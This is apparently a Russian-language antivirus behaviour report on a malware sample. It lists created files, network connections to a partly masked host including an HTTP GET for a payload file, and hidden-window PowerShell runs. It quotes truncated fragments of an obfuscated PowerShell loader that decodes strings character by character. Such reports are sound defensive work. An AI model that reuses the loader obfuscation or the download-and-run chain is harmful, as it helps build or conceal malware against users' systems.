Техническая информация
Вредоносные функции
Запускает большое число процессов
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\jaded.bfk
Сетевая активность
Подключается к
- 'ta###chutz.org':80
TCP
Запросы HTTP GET
- http://ta###chutz.org/wsb642884001/befalede.jpb
UDP
- DNS ASK ta###chutz.org
Другое
Создает и запускает на исполнение
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "Function Rgfanernes9 ([String]$Konsummlken){For($Astricted=1; $Astricted -lt $Konsummlken.Length-1; $Astricted+=(1+1)){$Sandiver=$Sandiver+$Konsummlken.Substring( $Astricted, 1)};$Sand...' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "Function Rgfanernes9 ([String]$Konsummlken){For($Astricted=1; $Astricted -lt $Konsummlken.Length-1; $Astricted+=(1+1)){$Sandiver=$Sandiver+$Konsummlken.Substring( $Astricted, 1)};$Sand...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "Function Bailiary02([String]$Frgendes) { $Cumulately = [System.Byte[]]::CreateInstance([System.Byte],$Frgendes.Length / 2) $Meadowland = (cmd /c 'echo 16') For($Dramaserie=0; $Dramaserie -...
- '%WINDIR%\syswow64\cmd.exe' /c "echo 16"
